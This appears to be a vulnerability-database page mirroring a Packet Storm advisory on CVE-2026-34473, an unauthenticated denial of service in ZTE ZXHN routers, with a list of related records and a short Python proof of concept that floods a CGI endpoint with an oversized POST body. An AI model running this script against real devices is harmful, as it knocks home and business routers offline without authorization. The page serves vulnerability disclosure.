Lucene search
K

๐Ÿ“„ ZTE Unauthenticated Denial of Service

๐Ÿ—“๏ธย 20 May 2026ย 00:00:00Reported byย Mina Nageh SalalmaTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 37ย Views

ZTE routers suffer unauthenticated denial of service from oversized POST bodies to CGI endpoints.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-34473
6 May 202600:00
โ€“attackerkb
Circl
CVE-2026-34473
27 Mar 202623:26
โ€“circl
CNNVD
ZTEๅคšๆฌพไบงๅ“ ่ต„ๆบ็ฎก็†้”™่ฏฏๆผๆดž
6 May 202600:00
โ€“cnnvd
CVE
CVE-2026-34473
6 May 202600:00
โ€“cve
Cvelist
CVE-2026-34473
6 May 202600:00
โ€“cvelist
Exploit DB
ZTE Routers - Unauthenticated Denial of Service
29 May 202600:00
โ€“exploitdb
EUVD
EUVD-2026-27881
6 May 202621:31
โ€“euvd
NVD
CVE-2026-34473
6 May 202619:16
โ€“nvd
Packet Storm
๐Ÿ“„ ZTE ZXHN Router Denial of Service
26 May 202600:00
โ€“packetstorm
Positive Technologies
PT-2026-38217
6 May 202600:00
โ€“ptsecurity
Rows per page
# Title: ZTE Routers (17+ Models) - Unauthenticated Denial of Service via
    Oversized POST Body
    # Date: 2026-05-20
    # Author: Mina Nageh Salalma (Monx Research)
    # CVE: CVE-2026-34473
    # Vendor: ZTE Corporation
    # Affected: 17+ ZTE ZXHN router models (~140,000 publicly exposed devices)
    # Category: Remote / DoS
    
    # Description:
    # CGILua post.lua parser does not enforce a maximum body size on
    # application/x-www-form-urlencoded POST requests. Sending an oversized
    # POST body to any CGI endpoint crashes or freezes the web service.
    # No authentication required.
    #
    # MITRE: https://www.cve.org/CVERecord?id=CVE-2026-34473
    # Write-up:
    https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers
    
    # PoC:
    import requests
    url = "http://TARGET_IP/cgi-bin/luci"
    payload = "a=" + "A" * (256 * 1024)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    try:
        r = requests.post(url, data=payload, headers=headers, timeout=15)
        print(f"HTTP {r.status_code} - device still up")
    except requests.exceptions.Timeout:
        print("Timeout - web service unresponsive (DoS successful)")
    except requests.exceptions.ConnectionError:
        print("Connection dropped - web service crashed (DoS successful)")

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 May 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.17.5
EPSS0.01634
SSVC
37